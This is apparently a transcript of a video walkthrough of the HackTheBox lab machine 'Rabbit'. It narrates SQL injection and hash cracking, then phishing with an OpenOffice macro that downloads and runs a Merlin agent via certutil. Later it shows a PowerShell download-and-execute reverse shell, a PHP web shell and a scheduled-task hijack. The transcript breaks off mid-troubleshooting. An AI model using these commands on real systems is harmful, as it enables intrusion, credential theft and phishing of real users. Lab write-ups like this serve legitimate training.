What's going on, YouTube? This is Ipsec, and we're doing Rabbit from HackTheBox, which had a lot of holes you could go down. It had Exchange installed, which put OWA on it, which is a webmail client, SMTP to send mail. Probably some pop stuff was listening. Also had Active Directory installed, which put LDAP and DNS. And then on top of that, it had its own HTTP web server installed that had Joomla and Complain running PHP applications. It just had a lot of things to enumerate. So we'll kind of enumerate most of those things and show you when I stop enumerating one thing and move on to the next. And again, always putting some type of recon in the background. The actual path through this box was a SQL injection in Complain that got you credentials to webmail. From webmail, you could see that Defender was installed. It had a PowerShell Constain Mode, and users were expecting to receive an OpenOFfice document. So you create a macro in an OpenOffice document, email it to them, they execute the macro, you get a shell. And then to do all that, we're going to be using the CNC tool, command and control tool, Merlin. We're not going to use Metasploit or Empire because I didn't want to use Metasploit because of the Windows Defender, they say, and I avoided using Empire because of the PowerShell restrictions, they also said. So Merlin is one written in Go, and it should bypass both of those. So we'll do that, and then from there, you are a domain admin, you have to bypass UAC. You could either do it through a scheduled task, or you could drop a file on the web server. So that is the box, so let's jump in. And nmap the box with -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call this rabbit, then the IP address, which is 10.10.10.71. This does take some time, so I've already ran it. Going over the results, we have quite a few ports open, so there is a large attack surface on this box. The very first thing we see is Microsoft Exchange SMTPD on port 25. And because it is a mail sending protocol, it normally sends the host name, so useful for like anti-spam DKIM and stuff. Since we know the host name of this box, let's just go ahead and add this to our host file. It's not often that you're required DNS to do some things, but it's always one of those nice to have things so we don't have to remember the IP address. So I'm going to do rabbit.htb.local, and we'll also do htb.local as well. So all three of those names will resolve to 10.10.10.71 because I just hard-coded it on my box. Next port open is DNS, and that is a Microsoft DNS server. 7601, so this is probably going to be, I want to say that's 2012. I'm not positive, but we could always Google that. We'll just keep going through this, but DNS is open, and I guess we can poke around at DNS to see if there's any internal IP addresses assigned to this. Of course there is, because this is HackTheBox, everything is internal. It's not like an external thing, but to do that, I just ns lookup, say the server is 10.10.10.71, which is Rabbit, and then we can do things like query, hey, do you know who Rabbit is? And the server's not responding, so it doesn't have the reverse lookup for that. I Control-C to speed it up. Server 10.10.10.71. We can do rabbit.htb.local, which is its fully qualified domain name, and we get back a IPv6 address. So I'm always going to take this, and let's just quickly nmap IPv6 while we're going over the other thing. So nmap-6, and we're not going to worry with scripts or any of that nonsense. Oh, came back quick. So it's looking at a quick glance like everything is the same: 25, 53, 80, 389, 443, 445. So I don't see 3389, which is one I'd look for, especially when there's a firewall. That's remote desktop. So one of the things I do with DNS, just try to find any other IPs on the box I don't know about, if it's dual homed, whatnot. We have port 80 open. So we're going to be doing a Go Buster, obviously, on this. Then there's 135, which is a Microsoft Remote Procedural Call, 389, LDAP. So this is looking more and more like a domain controller as well, because not many Windows servers open LDAP other than Active Directory. 443 is open, that is IIS, and again, we have the host name set in the certificate, so definitely know this is rabbit.htb.local. It's the same thing SMTP said. It is IIS 7.5. Then we have 445 open, which is Samba, so we can do things like psexec most likely. SMTP on port 587. This is the, I think, encrypted version, I believe. Bunch of other ports, 593, 636 encrypted LDAP. MySQL on 3306, that is interesting. 8080, another web server. And that looks about it. So let us access all of the HTTP pages. So we're going to go to Rabbit, then HTTPS, Rabbit. Oh, because I didn't put any qualifiers, it automatically Googled Rabbit. So http://rabbit 403. Go here. Get IIS7. So we know there's something different between port 80 and port 443. So we have to check both of them out. And then let's also check Rabbit on 8080. And we get a picture. Look at the source code, example, nothing else. So we have 3 different things we have to run GoBuster on to find. Let's just open up a new tab in Terminal and then create the panes that we want. Let's do GoBuster-H, and we're going to specify the URL, which is http 10.10.10.71, the word list, user share, word list, GoBuster. I was blanking for a second. And then directory list. Oh, we'll try 2, 3, small, because we have to do 3 different ones. So I'm just going to do the small list. And then we'll do -O for out file, I believe, or I think it's -O. O string to write out. Yep. So we'll do GoBuster.80, GoBuster.small.80. So we know what word list and what port we ran it against. Then let's run this again with -O, GoBuster.small.443. Do HTTPS. We have to specify -K to ignore SSL certificate. And then the final one will be port 8080. So -O, GoBuster.small, 8080. So we get /public/exchange. If we go to those, let's see what happens on 443. /public, and we get redirected to Outlook web app. And this is 2010 exchange. So let us see if we can enumerate users real quick. So I'm going to go into MSDB run. And this is like MSF console, but Got Milk pointed out, doing this automatically starts Postgres for you and then starts Metasploit. So it's a bit handy. I've always been using that since then. And what I'm going to try to do is set up some type of script to enumerate valid usernames, because I guess maybe timing attack, JavaScript, or something that gets returned from Outlook logins lets you know if a user exists or not. So we're going to search, and then we can do OWA, I think. OWA login. So if we use this, show options, and we have OWA version 2013, which is supported. So maybe we can do show targets. Oh crap, I forget how to do this. I don't think this script actually supports the OWA 2010. So this would just be something to test on newer things. So if we set username to administrator, set username administrator, set our host to be 10.10.10.71/OWA. I wonder if it wanted the IP, and there's a URL somewhere. Actually, I think OWA is a standard thing, and that's what it wanted. It's doing a DNS lookup, and that's why it took forever to fail. So yeah, I think it just wants 10.10.10.71 there. Then we can set vhost to be rabbit.htb.local. And I think if we just run this, it's going to try to log in. It's expecting OWA 2013, so it's not going to find if it's a valid user or not, unfortunately. While that's going, we can look at GoBuster. We have index, favicon, index in all caps, Joomla, and complain. So we got a few other things to look. Connection timeout to 10.10.10.71. That is odd. Is there a SSL thing? Brute force, password, proxy, top one success. SSL true, yes. Top one success, no. That should have done something different. We'll unset vhost. Run. Found domain, HTTP. So set password test. Okay, so failed login, but username is valid, HTTP/administrator. So let's set this name to something that isn't valid. So if we set this to that, definitely not valid, and run. Failed, but username is valid. And that's because this script is expecting OWA 2013 instead of 2010, which is installed, I believe. So if we locate this, and we can see if there's any other targets. If there is, we can Google around Metasploit to figure out how to do that. Target. We can search for 2013, I guess, in this script. This module test credentials on 2003, 7, 10, 2013. Huh. Set actions. Wonder if there's a way to set the target. I was really hoping that it wasn't and didn't really look into this that much. Show options. I thought I could have done show targets. Set action to be OWA 2010. Info. Show options. Maybe this will work. Run. But username is valid. Set username. Definitely not valid. Set vhost. rabbit.htb.local. Run. So it looks like this script isn't working. Set action. Let's see. What was another one we could set it to? We just set 2010, so we can try 2007. So it's always detecting the username is valid, so something is wrong there. We're going to end that rabbit hole and come back to OWA because we want to check the other things. And a lot of time those user enumeration things may work or may not. Results may vary, but it's something you should check because it's nice to have things running in the background. So let's check out Joomla. So if we go to Rabbit 8080 Joomla, we can close out these tabs. Down the rabbit hole, we don't see any posts or anything. I'm going to check administrator manifest. Then I can go to files, joomla.xml. I see this is Joomla version 3.8.1. Google this for release notes to see when Joomla 3.8.1 got released. October 4th, 2017, which is probably around the time this box got launched. So as an up-to-date Joomla. Joomla 3.8.1 exploit. And these are probably all plugins. So it's really hard to find vulnerabilities by just, that's my email. Sorry about that. Find vulnerabilities in popular CMS systems by just specifying a version number. So we can just do Joomla core exploit and then see what's been around. So 383, privilege escalation. So this is going to require a account most likely. And I wasn't aware of any Joomla things after 381. And let's see. Authenticated. Yeah. Attacker needs to be authenticated to the Joomla backend with manager account. So this isn't even just a user account. This is a manager account exploit. So I stopped looking right into Joomla after that because I just wanted to see what was on complaint. So just being software up to date, not seeing content on the site was enough to scare me away. So we can do complaint. Was it complain? Maybe not complaint. There we go. And we get this complaint management system. And we see it's powered by TechZoo, a zoo of technology. Going to the site. I think it's actually valid. There is another thing we can do, and that is SearchSploit complain. And this is going to check exploit DB to see if there's anything known. And it looks like we do have some SQL injections. And going to TechZoo does, I guess I don't want to be at the site with all these ads. I have no idea what's going to be on that site, and it looked like they have bad ads that I didn't feel like putting on YouTube videos, so not going to dig more into that. Looks like very crappy software, and we'll leave it at that. First thing is blind SQL injection, so I'm not going to look at that, and it's also saying hard-coded credentials, so no, I'm actually going to look at this because I want to know what they default to as hard-coded credentials. So we do searchsploit-x, paste that, and it looks like username administrator, user type admin, and password 123, or admin 123. So we're going to try that. Username administrator, password admin 123, user type administrator, and log in. You are not an admin. So put junk in, see if we get that same error message. We do. So I thought maybe the administrator account existed, just got downgraded to a different user, but looks like that's displayed on failure. So let's see. It looks like this is doing something that is authenticated. Admin view. So let's see if we can register an account here. So register. And once we do, we're going to see if we have access to this page. If we do, then we can try the SQL injection. So username is going to be IPsec. Password is going to be password. Account type should be customer. That's fine. Please subscribe. Lane. And we'll do 123 for an address. Mobile number 555-867-5309. And we'll do email at subs@thanks.com, I guess. Register. Looks like we did register. We'll say never remember the site. IPsec. Password is password. And change our user type to employee. And log in. IPsec. Password. I think I fat-fingered typing password. So I'm pretty sure we should be able to log in. Register. Let's go. Please sub password. I'm going to type password and copy that in here. 123 55. We'll do 555-867-5309 and 1@b.com for an email. Okay, I still have my password copied. Register. Please sub. Paste my password in. I think I did employee last time. That's weird that it goes administrator, customer, employee. I think it hit down 3 times. Maybe that was the issue. And we get logged right in. So let us try going to this page. So copy this. paste this, and we can see something. So let's put a single tick in and try to validate the SQL injection, and we actually get a error message. So let's do dash dash base dash to comment everything else out, and we're still getting an error message, which is odd. If we zoom in a little bit, you may be able to see it's escaping our single quotes. So let's just try dash dash base dash to see what happens. And doesn't error out. Let's put junk here that should error. It doesn't. If we put something before plans, it says the table plans doesn't exist and the database complain. So we know we have SQL injection here. The downside is it is doing some type of escaping of quotes. And if we try to double quote, we see it escapes that as well. So let's just do our union injection. So single quote space union select 1. We just have to know how many fields go into a union. So let's do, we have to comment at the end. And we don't want this single tick. So they try to stop SQL injection by escaping dangerous characters. The downside is the statement looks like select stir from table where query is equal to plan. That's what it looks like. Generally, you have where query is equal to that. And that's why when you inject a single quote, you have to do the comment to get the other single quote out, because you want to terminate the SQL injection looking into this field, because they encapsulated it in quotes. So if you didn't put a single quote there, you'd just be going into that same argument. But because there's no quotes around what they're searching for, you can just add a space and then you hop into the next argument, if that makes sense. Hopefully it does. So we're just doing plans union select 1. We don't have any output. Let's do 2. No output. 3. No output. 4. Nothing. And we should be getting something. Oh, there we go. So this was silent error messages, actually. We don't have any error message, it's not displaying anything. But as soon as we hit 5, the valid amount for a union, everything shows up. And we see 2, 3, 4, 5. This is a new row. So if we put like AAA in this, it's going to error out because of the quotes being escaped. So we can do like concat. Well, we don't have to use concat. We can just do like 0x41414141, 4 A's. And then we see we injected here. So if you go to any other SQL injection video, I'll try to remember to put stuff in comments, but like Karen and stuff like this, you'll be able to take it from here and do it all manually. You'd want to go to like the information schema table, extract all the databases, columns, table names, etc., and do a bunch of that type of stuff. One of the videos, we actually created a Python module, I think, to do all that. But I'll try to link those. I'm a little bit strapped for time right now, so we're just going to do the easy route and send this into Metasploit. So we're going to do intercept on. Then we just want to go to a clean page. And we have to turn a browser to go to burp, refresh. Then we can copy this to file. And then we want to do report.request, or save it as report.request. Save. My file existed. Yours probably won't, but create that request. Then we can do MySQL-r to load the request. And we want to specify, what did I just literally call that 5 seconds ago? Report. Report dash, not MySQL, SQLMap. That's my tab autocomplete wasn't working. There we go. And then let's do dash dash technique equals U for union injection. We know that's union injectable. What else do you want to do? DBMS, MySQL probably. And I think that should be fine. Could have probably done like -- batch. The technique, I think it's BEAUST. Let's see. SQLMap -H. Techniques. BEUSTQ. Boolean, encapsulated, union, stacked, time, blind, maybe? Forget what it is. I think this is actually asking me for input right now. There, enter, whatever default was. I forget what that is. I think that it was right, what I just said. Let's see. While that's running, intercept off. SQLMap, BEUSTQ. I don't know what Q is. Disable. Let's see. This is going to say what each one is. Boolean. I said encapsulated for E. Error. Error is so obvious. Boolean, error, union, stacked, time is T. And query inline. I don't know what that means exactly. I think it's a type of stacked query, honestly. Or maybe it's like whatever comes after a semicolon. I don't think it's too common. But you can do more research on those. That's all the types of SQL injection. If you know what it is beforehand, specifying it manually helps out tremendously. So we do have it union injectable. So the first thing I'm going to do is a -- dump to dump everything. And we'll see what's in this database. So we have username, email, stuff that looks like just people making complaints. My machine's making noise, Office not working, unable to connect. So complaints right there. That table's not too interesting. Customers, we have us. I didn't fat finger that. I know now, but I'm guessing it was just, again, that login page. It went administrator, customer, employee. And I was probably trying to log in under employee because I was like, oh, I'm just going to go to the very bottom field because I assumed there's some type of order or I assume it's ordered by privilege level, not alphabetical. Plans, engineers. I don't really see any passwords there. So we didn't really get anything from that. But there was a Joomla site on this same port. So let's do --DBS to list all the databases. And we can see the Joomla database. There's the MySQL database, information schema that has all the information about MySQL. Secret is new. I don't know what that one is. So let's do -D, Joomla, --dump. I'm getting all the information for this. And if we go into a new tab, root, MySQL, not MySQL, SQL dump, output, rabbit, dump, Joomla. And this is generally how I view things. We got assets, categories, types, and extensions. We actually don't have anything with like passwords. grep I password star hash. So didn't really get anything out of Joomla. So I may have not had permission to a lot of the tables. But let's do that secret database that it had. So if we do -D Joomla, -D secret, let's see. It wants to crack passwords. Sure, we'll do yes. Default dictionary. And see if it gets anything. So we got Barcelona for user Malik. Popcorn for Dumma. Pussycat Dolls for Ariel. Santiago for someone. So let us... Oh, I forgot I had the help here. Fix that. Go up here. And let's put all these in a file. So v creds, we'll do Malik, Barcelona, Duma, Popcorn, Ariel, Pussycat Dolls, Mobius, maybe, for Santiago. And let's try that Metasploit thing again, see if that thing works. MSDB, run. Database is started, so it's not going to start it. And this has a user pass file. That's why I put them both in the same thing. So let's see, search OWA. Let's do OWA login. Use, show options, set action OWA 2010. Our host, let's see, try username as password, user file, user pass file. So file containing users and passwords separated by a space, 1 per line. That sounds like what we did. So user pass file, creds, run. And we didn't get anything. Oh, yeah, the domain is HTTP probably because it's rabbit.htb.local. Let's see, failed login for everyone. Set action, let's do show options, set action OWA 2013. So we got one failed login actually. So maybe this is OWA 2013, not 2010. Maybe I'm wrong there. But we do have a successful login. So we know Ariel is Pussycat Dolls. So let's go over to the OWA page, which was https rabbit OWA. And we want to log in with Ariel and Pussycat Dolls. And we have a few emails. So we see there's been a change in allowed software. Help desk has moved everyone to OpenOffice. Has deployed Windows Defender and PowerShell Constain Mode as the default organization security standard. So when I know they do some type of PowerShell protection, and this is going to be easily bypassed with just specifying PowerShell version 2, because all the PowerShell versions, PowerShell protections are in version 5. So if you downgrade PowerShell by doing -v space 2, you bypass all those. PowerShell Net version 2 is now uninstalled by default, I believe, so that doesn't work. But when I see them doing stuff with PowerShell, I generally revert to not using PowerShell because it's so easy to catch people if you have PowerShell logging on and they use PowerShell. So, and then we have them asking to send TPS reports to management. So we know they use OpenOffice, what defenses they have, and they're expecting TPS reports, probably in an OpenOffice format. So what I'm going to do is reply to this email, see who is on it. We got administrator, Kane, and Magus. If we just do check names, it doesn't look like that's working. Attach, that's not working. Let's try signing out so we can switch to that light mode. So use light version of Outlook, Ariel. I think Pussycat Dolls is still my clipboard. It was. So now let's go back to the check names. Does this load? Is this a pop-up, a pop-under? Attach? Oh, it's doing stuff to the frickin' right. And now that's not working. Okay, when we redo this, this should be easy. So most recent recipients. We got Raziel, Magus, Kane, Administrator, Ariel. Kane. It's not adding them all. That's annoying. So let's do Ariel. I'll send it to myself just to make sure it works. Kane. Why isn't it doing multiple people? Kane. Raziel. Okay, I'm switching to Chrome. Let's see. Chrome, no sandbox. Stuff you should never do. Should just switch to the user and do it, but I don't have it set up to do that yet because I reinstalled everything. Sure. Chromium. Okay, now let's try this again. Maybe this will be better. Rabbit, Ariel, Pussycat Dolls. It's always important to have more than one browser because some things tend to not like some browsers, and old versions of OWA are notorious for that. Check names. Let's try Ariel, Kane. There we go. Magus, Raziel. So now I can add everyone. TPS report. Oh, we have to create a phishing document. So let us also open up OpenOFfice. And you can just install LibreOffice. I got that off of apt. And after we generate the macro, we're also going to have to create a payload. And I'm going to use Merlin. I'm not going to use Metasploit because they have Defender. I'm not going to use Empire right away because they have some type of PowerShell logging. So my initial foothold is going to be Merlin. And once I do that, I may do a reverse shell with PowerShell and do things like that. But my initial foothold won't be PowerShell because I want to take as many variables that would stop it from working out of the equation. And if I went with PowerShell and just tried the -v2 and they didn't have PowerShell version 2 installed, then I could be getting a false negative where the exploit worked, but I didn't get a shell because of something I didn't take account for. So I know Merlin probably will almost always work because it's relatively new, Defender won't pick it up, and it's not PowerShell, it produces binaries. So all that being said, let us go into creating it. So if we go to Tools, Macros, Edit Macros, Standard, File, New. How do I do this? Select macro here. Untitled, that's my document. Okay, New. Module name, Module 1, sure. I'm going to take this out of main and put on load. And then we can probably just do shell cmd/c. And in order to get a binary without a binary on the machine without using PowerShell, I'm going to use certutil. We can do -url cache -split -f. And now we want to specify the file. So HTTP 10.10.14.2. Please subscribe.exe. And we'll put that in C:temp. We'll say thanks for subscribing. And then we want to execute it. Thanks.exe. Okay. So upon opening the document, it's going to run this macro. So we can save. We'll save this as ipsec.odt. Close out. Close out. And now we have to generate everything. So we can get rid of this SQL. If we go to opt Merlin, this is a Go thing. And I'm going to do a little bit of cleanup because I probably used Merlin. So let's see. Merlin agent. Let's remove the executable. Let's go into Merlin server. Data. Merlin server. Okay. So, oh, I don't have a dot. Package. Okay, so let's see. v.bash. Not history. Profile. Is that what I specified? I'm not sure why I specified my Go path. So let's just go into Go. make dir back, and vstar back. Okay. The reason why I was doing that is because I want to show going to get all the modules and doing all that stuff. Because I've used Merlin before, so there's no setup for me since I've used it before. So the very first thing to do is download Merlin. Make sure you have Go. And for this video, do I just type Go version? I'm using Go 1.10.3. So the very first thing to do is we're going to have to try to compile Merlin. So if we go into CMD, Merlin agent, and then do go build, it's going to come with a few errors. So it can't find the package. So I'm going to go get this package, and Go's repository manager is GitHub. So get the packages. Did not get that one. Now we do go build. We have an agent. The downside is the agent is a 64-bit ELF executable, which isn't going to work on Windows because this is a Linux binary. Go compiles for pretty much anything. So we can just do go OS is equal to, I think it's Win, maybe Windows. And then I think go arc is equal to AMD 64. And then go build. Is it Windows? There we go. And now we do Merlin agent.exe. We see it is a PE32, a Windows thing, and it's 64-bit. So that is cross-compiling in Go, which is one of the main reasons I like it because it makes it so easy. The other thing I probably forgot to clean up that I didn't do is if you go into main.go, I have hard-coded my IP into this binary. There is a flag you can do with an argument, so you can call like Merlin agent.exe, I think -a or something, or -u for the URL, and specify it, but I just like hard-coding it into the binary because I hate passing arguments because I may pass the argument wrong, and then again, you get that false negative of where you executed code, but because it didn't accept the argument, you didn't get a response and you assumed it was a fail. So build this. We also have to build the server. So go into Merlin server. And this one gets a little bit tricky because we're going to have to do SSL stuff. When we do /Merlin, it wants SSL certs. So what I'm going to do is move Merlin server up to directories. And I'm going to wipe out what's in my data, because I probably have my SSL cert here. X509. Yep. So clear out the cert. We can do that. And now we're going to have to generate a SSL cert, because Merlin uses HTTPS 2.0 as its communication stream. So in order for it to do SSL, we have to gen a cert. So we're going to use OpenSSL, then rec x509, new key RSA 4096, SHA-256. Key out is going to be server.key. The out file is going to be server.cert. The subject is going to be cn for common name. We'll do ipsec.com. And -days. We can do anything we want. I'm only going to do 7 days. The cert's going to be valid for 7 days. Normally you do your engagement time for how long your cert is valid for. Maybe you add a week so you have extra time to run a kill all command, but hopefully your agents automatically kill themselves after a certain amount of time. And as I was talking, I made a lot of typos. That was fixed. Let's see. I think that's good. It's going to generate the key. And now we should be able to run Merlin server. There we go. The downside right now is it's listing on 127.0.0.1.4.4.3. So let's do Merlin server -I for IP or interface 10.10.14.2. I hope that's my IP. I wrote that in the macro. Yep, that is. So we got the agent running. Let's rename this to Merlin. And then we can exit Metasploit. We want to go into opt Merlin. And let's generate a Linux copy as well. So I'm just going to do go build. And I'm doing this so I can test out to make sure everything's working. So if I just execute Merlin agent, I should get a callback here. And then it's very much like Empire. So you interact. You can do info to see everything. Show options, I think. Not options. Help. So info, list option, list settings about your agent. Help, get what you can do. There's no modules in Merlin. You just run commands. So I can do cmd ifconfig, and it's going to task that agent to do an ifconfig and report back. And the default check-in time is 30 seconds, so it can take a little bit of time. But that is how Merlin works. So we can do help, kill this agent, and we know at least everything looks fine. So let's copy Merlin agent to be the .executable into root HTTP boxes rabbit, and I want to make a directory. We'll copy it there. Go into that directory, make dir dub, move that agent into dub, and let's just name this, was it please subscribe.exe. We're going to go back, open up LibreOffice to ensure we save the macro correctly. And the macro is not going to run correctly on a box because it's a Linux box and we're calling like cmd.exe. So obviously that won't work. It's taking a while to load that. Maybe we'll just YOLO it and nope, there we go. So let's do file, open, and then we want to go into, where did I save that? Did I not save the file? Where's the default location? Save as. Root documents. Open this. It contains a macro. Good to know. Edit macros. IPsec ODT. And it looks like everything's good. cmd.exe/c, certutil, download please subscribe.exe, save it to SQLMap, thanks, because you guys subscribed, I know that. And then and if successful, run the program. So I think everything is good. So let's go back to Chrome, not Firefox. We can go to the drafts, a TPS report, attach, choose a file, go into documents, IPsec, attach this, done, as requested, and then send. And now the waiting game comes. Actually, Python M, simple HTTP, server 80. We'll call this HTTP server. Chromium, that's fine. Let's see. We don't really have anything else in GoBuster, OWA. Even on HTTP/OWA redirected you to probably the SSL version. I just did Control L there to clear, but It can take some time for the macro to execute, so I'm going to pause the video and hopefully we get a hit. It took about 6 minutes, but we did get actually 2 hits. And we'll go over to the Merlin tab, but only 1 agent check-in. So it's a bit odd that it hit us twice, but it only executed once, so I'm guessing the payload just ran once. We do interact with E3 whatever. We can do CMD who am I. Actually, we'll do info help set sleep to be 5. It's going to take probably 30 seconds for it to check in and set that sleep to be 5 seconds. Let's see. It is active agent wait time. So I'm going to see if this changes to 5 seconds. Still 30. And I don't use Merlin all that often, so I think that was the correct command. It looked right. We'll see. We'll also issue a CMD who am I. And while that goes, we can get out of Chromium because we don't need that anymore. And we can set up our reverse shells. So let's go into www and then copy opt Nishang. What is it? Shell. Then invoke PowerShell TCP.ps1. And we can edit this. And we want to do the reverse shell. Put that in. And we can do 10.10.14.2 as our IP address. 9001 as the actual shell. Save this. And then go back over to Merlin. We did get a callback. We are HTB Raziel. Do info. Sleep is still set at 30 seconds, so didn't take that command. Oh well. We will do CMD PowerShell -v space 2, then -exec bypass. This is the bypass execution policy thing. IX new object net.web client download string HTTP 10.10.14.2 / let's make this a bit easier to do. We'll just call shell.ps1. Go to Merlin, shell ps1, and that. Go to our HTTP server page, start it. Then we do nc lvmp 9001 and see if this executes. So it should only take about 30 seconds for it to run. And I think it says failure if we did something wrong. But we're doing PowerShell -v space 2 to see if they have version 2 enabled, and this will bypass their constrained policy. -exec just in case they have script require like script signing or things like that. This is just the execution bypass thing. And then put this in quotes so it's all in one argument. It does contain spaces, which is the default delimiter to do our badness. If we look at HTTP server, we do have the shell callback, or it hitting the page, and then us getting a shell. So let's rename this to shells. And then we probably should copy something like PowerUp. So opt, PowerSploit. I always love using the dev one. Then we can do, what is it? Privesc, PowerUp. IX, new object, net.web client, download string. We like doing single quotes here. 10.10.14.2, PowerUp.ps1. That looks good. File not found. Oh, this is not in the www directory. So let's move PowerUp there. Then we can copy this, paste it again. We loaded it. And let's now use the new thing we have, which is invoke all checks. And that is in PowerUp itself. If we just grep the beginning for function on PowerUp, want to make that case insensitive. We can see all the functions PowerUp has, and then there was a all check somewhere. Well, Privesc audit is aliased to all checks. Let's grep -i all check. Invoke all. Yeah, alias. So Privesc audit is alias to invoke all checks. So let's see. User is in local group with administrative privileges. It wants us to use this wscript bypass. Unquoted service path. We don't even have to do any of that because we're already admin. We could probably just write to those files. Access to a VMware path is denied. So I'm also going to use another script called JAWS. So if we copy opt JAWS enum here, and then we can run that. So ix new object net web client download string 10.10.14.2 / jaws-enum.ps1. And if you just Google GitHub JAWS Windows Enumeration, you'll find this script easily. So this one takes a while to run. As soon as you load the script, it executes, I think, all checks. So JAWS Windows Enumeration GitHub. This is it. That's what I ran. So I'm going to pause the video, let this run. It'll probably be 5 minutes, I'd guess. It takes a while to run, but it does a lot of cool stuff. JAWS has finished running, so we can take a look. Auto login, we have Raziel with these credentials. So the very first thing I'm going to try to do is use Impacket. And I always like using the GitHub version because it's a little bit newer. Like Metasploits right now is, I think, at, let's see, what are we? We're not 1918. Metasploit's at 0918. Metasploit, not Metasploit. Kali is at 0915, and one of the differences is SMB v3. So Impacket is one of those scripts. I like using the GitHub version. So we'll do HTTP/Raziel. Did I spell that correctly? If we go back to shells, Raziel. Okay. And then we want to do at rabbit htb.local and paste to make sure the password was correct. cmd.exe. Put the password, connection reset. So that didn't work. We'll try wmyexec. Try a few things. It doesn't look like this will work. Was it winrm? What's the other one we can do? dcomexec. Keep getting connection resets. So maybe there's something going on with the firewall or something, but doesn't look like this is working. Because if we go into users administrator, we're getting permission denied. We are an administrator, but UAC is on the server. So I may have neglected to mention that's what I was looking for. I'm looking for a way to get out of UAC because PowerUp, if you recall me saying a few minutes ago, said I was a member of the local group, and then I saw all the other error messages which told me UAC, but I think I forgot to mention that as I was saying it. But let's go up. Stored credentials, nothing. Cache files, 10 last modified files. I like how JAWS specified user.txt is interesting. I wonder if that's just because it's in desktop. xyz.link. User link. we got some weird shortcuts in recent documents. So we need to find out what that XYZ thing is. Unquoted service path. It looks like someone did PS exec right here. That random .exe. There's desktop. Program files. So you can see JAWS just displays a ton of information. We see a bunch of things from 10/24/2017 patches. And I think that's around the time that Joomla thing said it was installed. So the machine was fully up to date. Going up, that is just installed programs. Let's see. What do we have? Anything interesting? Security. Bunches of client packs. OpenOffice. IIS. Nothing too interesting. Services. So I'm sure we'd find an interesting service here. WAMP MySQL. That's running, so we may be able to use MySQL to get system. There's probably a few other things running there. Let's see. It's a lot of services. We can go through this real quick. Oh, we may come back to it. We got a lot of enumeration to go through. But I wonder what was on port 8080. Because we could probably either write to IIS or port 80, whatever's listing on port 8080 and get a shell that way. I homing in on port 8080 because we know that runs Joomla. Joomla's PHP. I'd rather use PHP than IIS because I freaking hate ASP. So we'll probably go back and try to find where Joomla is stored and write a shell that way and see if it's running a system. And if it isn't running a system, we'll have an interesting token, the SE impersonation token, and be able to escalate to admin through Rotten Potato or now Juicy Potato by Decoder. These are all scheduled tasks that I'm looking through now. I was just talking as I was reading, just slowly scrolling up, see if there's anything non-standard. And you can see how many scheduled tasks are in Windows. Nothing there. It's easy to miss things. We have a task name here. System maintenance, running by Raziel. cmd.exe, test.bat. So it may be worth it. Here's someone using, oh no, this is, I thought it was Empire Persistence, but it's the scheduled tasks for him to download and execute the documents. So we see it getting the attachment. So there's a PowerShell script that probably logs in, downloads all attachments, and then it just executes ODTs with PowerShell, and that works. I guess PowerShell can parse an ODT file and execute. That's weird. But key one right here is we're doing cmd.exe on appdata test.bat. And we can go, there's a bunch of processes running. Here's where the netstat output can tell us what's exactly running on 8080. But let's see. Will it? I'm getting tired of looking through all this enumeration if you can't tell. The output's so much information. 2364. So if we search for 2364, we see HTTPD. So it's not running IIS, it's running HTTPD. So that'll give us an idea of where to place a file. But did I copy XYZ correctly? Of course not. I highlighted and deleted it. XYZ. There we go. So we want to modify this file. See what this file is first. So type, file name. It's just running PowerShell, dir /temp. we still have thanks.exe, so we can just let's copy that out. I think there's a cron that cleans that up, so let's copy thanks.exe to c:\users public. Users public. It is there. So we can echo c:\users public thanks.exe to that file. If we execute that, we see it's going to call that, and it's a bat file with just this. It should call thanks.exe, which will give us a shell. If we do info in Merlin, we see just this one agent we interacted with. It thinks it's dead because it hasn't called back because of a reverse shell. So keep an eye on that. And while we wait for it, let us see if we can drop a shell. So where would HTTPD write to? WAMP64. Is there a www here? www. Joomla. So here we go. So if we just echo PHP system what if I need quotes? PHP system request shoot. I'm an idiot. That's what I wanted to type. Yep. Echo that. Failed, so we need that single quote. PHP system request. There we go. So let's do this. I don't know why I only copied a subset. I want to direct all that to please sub.php. And we have that file. If we go to 10, 10, 10, 71, 80, 80, please sub.php. We don't get a 404 error. And I know what I was screwing up. I'm an idiot. So this is supposed to be the variable name. I don't know why I can't think straight right now and wasn't doing the PHP shell correctly, but now I know what I need to do. So do that. Then we want request here, and we can put I'm a dummy here. Sometimes you just have those brain farts and you don't think straight. Please sub.php. Type please sub.php. There we go. And if we put this argument, I'm a dummy, equals who am I? We don't get anything. Maybe this is the one I have to echo. Oh no. Maybe it doesn't want the PHP thing. Some things get really picky about exactly how they process PHP. And since I saw in the source, there's no way it's executing because it's displaying PHP, I don't think it wants that PHP at the beginning. Let's see. Type index.old.php. How is this going? That is a big index. I have no clue what's going on there. Let's go to complain. Type view.php. It does PHP there. I wonder if it's just like an executable permission bit I didn't set. Echo PHP do this on separate lines as well. So to ipsec.php, then we can echo, we'll do echo system request ipsec that looks right. Then we can echo ipsec.php. So now when we view ipsec.php, it looks pretty much like everything else. And I think echo doesn't do a space. But this will tell us, at least it will give an error message. Nope, still doesn't want to execute. So, bizarre. What if we just do this in the script itself? So echo this to repo.php. Don't have write access. dir -a ipsec. That looks right. Type ipsec.php, type repo.php, does PHP and ends tags. It's exactly what I did. Why doesn't it want to execute my PHP code? Bizarre. Let's go back into Merlin. Do we have a shell yet? We do not. Let's see. XYZ. Let's try starting that task manually and kicking it. So if we have permission, we should be able to run this task system maintenance. So if we do a copy here, and it's, what is it? SCHTasks/tn, I think. Ready. Okay, so now we have to run it, which I had just forgot to do /run/tn system maintenance. Attempted to run, look at Merlin. We should get a callback. I wonder if Merlin's hung up because, let's see, temp. Everything's going bad right now. Everything. Merlin received a new agent. We gotta kill that shell now, unfortunately. Go back to Merlin. Interact 45DA. Then we can do that CMD again. And we should get the callback. If we look at Merlin, that was quick. Still at 30-second wait time. Okay. I thought it switched to the 5 seconds. So let's go to that schedule task. So where was XYZ? XYZ. And I'm jumping back and forth too much. I don't like it, but the famous last words, I should have prepared more and done this machine before recording the video. I did this probably 8 months ago or whenever it got released. So let's just do echo cmd/c, c:\users public thanks.exe. Maybe if we do it this way. and we'll copy it to this test.bat. And then schedule task /run /tn system maintenance. Attempted to run that task. Merlin agents help agent list. Do not have anything. I wonder if I'm specifying it wrong. Let's do SCHTasks run tn. Doesn't display anything. Let's see. Let's do echo. We can do certutil, then -URL cache split -f 1010. Actually, we'll just echo ping 1010.14.2. Simple enough. If this bat file executes, it will ping us. TCP dump -I ton0 ICMP. Run this. And we're not getting a ping. So we did something wrong with this. And if we just execute this test.bat, we'll see what happens. 